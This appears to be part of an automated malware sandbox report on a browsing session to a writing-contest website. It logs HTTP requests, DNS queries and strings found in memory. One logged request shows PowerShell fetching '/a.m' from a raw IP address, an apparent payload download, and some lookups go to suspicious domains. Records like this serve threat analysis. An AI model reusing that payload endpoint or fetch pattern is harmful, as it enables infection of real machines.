          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960118416&cv=11&fst=1731960118416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960116482&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dl-mIj4VTwUp_0jaEIja0RYzjgPxKXeUvJe0DH_7y1k3e7xyo&random=1607132100&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960118416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dDuAP5i2m911ZKC16RHWOmgY_aHXEEzwB9n6O9GwFshb0qgrx&random=1705948913&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960118416&cv=11&fst=1731960118416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?0bb944ce9eb8ccf482ff8db3c89d41d7 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: bx-ring.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960118416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dDuAP5i2m911ZKC16RHWOmgY_aHXEEzwB9n6O9GwFshb0qgrx&random=1705948913&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rb/6m/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: winningwriters.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /a.m HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.188.22.73Connection: Keep-Alive
          Source: chromecache_247.1.dr, chromecache_212.1.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=nB(a,c,e);V(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return V(122),!0;if(d&&f){for(var m=Bb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},qB=function(){var a=[],b=function(c){return eb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
          Source: chromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drString found in binary or memory: return b}FD.F="internal.enableAutoEventOnTimer";var Zb=wa(["data-gtm-yt-inspected-"]),HD=["www.youtube.com","www.youtube-nocookie.com"],ID,JD=!1; equals www.youtube.com (Youtube)
          Source: chromecache_326.1.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
          Source: chromecache_326.1.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
          Source: chromecache_326.1.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
          Source: chromecache_247.1.dr, chromecache_212.1.drString found in binary or memory: var UC=function(a,b,c,d,e){var f=LA("fsl",c?"nv.mwt":"mwt",0),g;g=c?LA("fsl","nv.ids",[]):LA("fsl","ids",[]);if(!g.length)return!0;var k=QA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);V(121);if(m==="https://www.facebook.com/tr/")return V(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!wz(k,yz(b, equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: winningwriters.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: cta.berlmember.com
          Source: global trafficDNS traffic detected: DNS query: scontent-ord5-1.cdninstagram.com
          Source: global trafficDNS traffic detected: DNS query: s7.addthis.com
          Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
          Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
          Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
          Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
          Source: global trafficDNS traffic detected: DNS query: static.ads-twitter.com
          Source: global trafficDNS traffic detected: DNS query: pixel-config.reddit.com
          Source: global trafficDNS traffic detected: DNS query: alb.reddit.com
          Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
          Source: global trafficDNS traffic detected: DNS query: t.co
          Source: global trafficDNS traffic detected: DNS query: analytics.twitter.com
          Source: global trafficDNS traffic detected: DNS query: www.facebook.com
          Source: global trafficDNS traffic detected: DNS query: analytics.google.com
          Source: global trafficDNS traffic detected: DNS query: w3-reporting-nel.reddit.com
          Source: global trafficDNS traffic detected: DNS query: premiumserviceads.com
          Source: global trafficDNS traffic detected: DNS query: bcbshieldn.com
          Source: global trafficDNS traffic detected: DNS query: google.com
          Source: unknownHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fwinningwriters.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1996116743.1731960007&auid=325201710.1731960007&npa=0&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&tft=1731960006872&tfd=7627&apve=1 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://winningwriters.comX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: chromecache_202.1.drString found in binary or memory: http://brm.io/jquery-match-height/
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: chromecache_181.1.dr, chromecache_191.1.dr, chromecache_239.1.drString found in binary or memory: http://ns.attribution.com/ads/1.0/
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: python27.dll.21.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
          Source: chromecache_313.1.dr, chromecache_192.1.drString found in binary or memory: http://responsive-nav.com
          Source: chromecache_268.1.drString found in binary or memory: http://responsiveslides.com
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://s.symcd.com06
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: chromecache_268.1.drString found in binary or memory: http://viljamis.com
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.???.xx/?search=%s
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: pyexec.exe, 00000015.00000002.2069622141.0000000003514000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.00000000053FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
